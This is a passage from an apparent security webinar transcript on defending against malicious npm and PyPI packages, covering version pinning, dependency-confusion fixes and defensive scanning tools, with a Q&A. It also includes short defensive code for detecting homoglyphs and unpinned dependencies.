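                findings.append((line_no, col, "non-ASCII letter " + name))
    return findings
```

Running it on a function definition whose name contains a Cyrillic letter in place of a Latin H reports the line, the column, and the Unicode name of the offending character, which makes the otherwise invisible difference easy to review.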
Essentially, we want to better manage the way that external repositories are queried when resolving dependencies in the build process, for example, by setting up exclusion rules to prevent searches for internal private packages in remote repositories, or by defining the order in which the repositories are searched in order to resolve a dependency. More information is available in our blog post at this URL, so we recommend that you read it. Another thing we recommend is to use strict versions for external dependencies. We want to avoid automatically fetching a higher, malicious version of a package, unless we perform full DevSecOps tests on a new version of our software that we publish. This will make sure nothing was broken in the update and everything is safe, so we can go to production in this case. Specifically in Node.js, for example, the default behavior of npm is to add a caret sign to dependency version numbers, which npm treats as this version or any greater minor or patch release. We can overcome that by editing package.json and removing any caret or tilde, so npm will install the exact version that we want. This is a very good practice when you don’t release a new version of your software and you don’t test it. We can also use the package-lock.json file to lock the transitive dependencies to a specific version. This, again, should be done with caution, because although we can ensure that malicious updates won’t be received automatically, security patches won’t be received either. So it is recommended, again, to update dependencies when releasing new versions of your software and test them end-to-end. We would also like to encourage the usage of the open-source tools that you can see here, which can help you deal with malicious packages and prevent them from infecting your projects. The first one is pypi-scan, which can detect name similarity to avoid typosquatting attacks on your project.
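To illustrate the strict-versions recommendation above, the sketch below reads a package.json document and reports every dependency whose version specifier is not an exact version, such as one starting with a caret or tilde. The function name and the regular expression are assumptions for this example; it checks only the `dependencies` and `devDependencies` sections and will also report specifiers such as tags or Git URLs.

```python
import json
import re

# An exact version such as "1.2.3" or "1.2.3-beta.1"; anything else is
# treated as a range (or another non-pinned specifier).
EXACT_VERSION = re.compile(
    r"^\d+\.\d+\.\d+(-[0-9A-Za-z.-]+)?(\+[0-9A-Za-z.-]+)?$"
)


def find_unpinned_dependencies(package_json_text):
    """Return {name: spec} for dependencies not pinned to an exact version."""
    manifest = json.loads(package_json_text)
    unpinned = {}
    for section in ("dependencies", "devDependencies"):
        for name, spec in manifest.get(section, {}).items():
            if not EXACT_VERSION.match(spec):
                unpinned[name] = spec
    return unpinned
```

A check like this could run in a build pipeline and fail when any range specifier is found. When adding a new dependency, `npm install --save-exact` records the exact version without a caret in the first place.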
The next one is piproxy, which is an open-source tool that we developed and published to the community. It is essentially a small proxy server for PyPI that modifies the behavior we talked about, so that external packages are installed only if the package was not found in any internal repository. This fixes the dependency confusion issue in PyPI installations, where the package that has the newer version is preferred, regardless of where it comes from. Lastly, we have a few more open-source tools that we developed and contributed to the community for npm package security. In the link below, you will find the tool npm-secure-installer, which can help you validate the version lockdown of your dependencies list in npm, and also package_checker, which analyzes a Node package and reports on suspicious heuristics, to help determine the safest package version to use in your project. The last tool is npm_issues_statistic, a very interesting tool that analyzes projects to find unusual activity that might indicate a compromised dependency. And finally, if you have any questions in the future, you can contact me by email. I would be very happy to answer your questions on malicious packages and supply chain attacks. Also, feel free to visit us at https://research.jfrog.com/, where you can find all of the malicious packages research projects that we talked about today, as well as deep analysis of zero-day vulnerabilities found by our security research team and technical analysis of notable CVEs that we research constantly.

Question/Answer Section:

Host: Our first question: Do you think this trend is tapering off or still continuing?

Jonathan Sar Shalom: Judging by the number of hits on our malicious package detection scanners, this trend is still continuing. We think that in the future we might see more sophisticated attacks, like Trojan packages with very well-hidden code or even dynamic code, and also expansion of malicious activity into other repositories and other languages, such as Java (Maven), Go, NuGet, etc. So I think this is not the end for this threat.

Host: Our second question: Do you recommend version locking as a solution against hijacked packages?

Jonathan Sar Shalom: So, as we said, we believe that updating packages is essential, of course, and we recommend version locking only while migrating to a new version. A DevOps pipeline should be put in place such that when a new package version for a dependency is released, the application’s complete test suite is run, and DevSecOps measures are also in place to conclude whether the new version is vulnerable or malicious. If all tests have passed, then the new version should be used. If some tests fail, of course, the application author should make the necessary changes to migrate to the new version of the package. Updating is, of course, essential in order to get the new features, improvements and, most importantly, security fixes. So yes, with a note.

Host: Excellent. Our last question: What are some of the signs that a package is trustworthy?

Jonathan Sar Shalom: Well, that’s a great question, actually. I guess several things. I think the first thing is a high number of downloads, stars, and forks; you can check this on GitHub or the Git repository of the project, or in the repository for the specific language that you use, such as PyPI. So the first thing needed is to check that it is popular enough. I think it’s also important to check that it is maintained, meaning that maybe the last commit is less than one month old, so you make sure the project is not abandoned. It is, of course, also important to check that the project does not have any open security vulnerabilities that were still not handled. It’s a good practice also to check for obfuscation, I guess, because obfuscation is usually an indicator of malicious activity. And another thing: for the specific version that you want to use, if it is the latest version of the package, you have to check that it is not too new, I mean that it is more than two or three days old. Normally, when we see attacks in which malicious actors infect packages, they insert a new version, and then the entire world is infected within a few hours to a day from the attack. So it’s important to make sure that you are not downloading a very new package, for this reason.

Host: Excellent! Thank you so much, Jonathan, and thank you all for joining. We’re so excited to have discussed the content with you today. We hope it was informative. If you have any questions or would like to sign up for future webinars or workshops, please visit our website at JFrog.com. Thanks again, and have a great day.
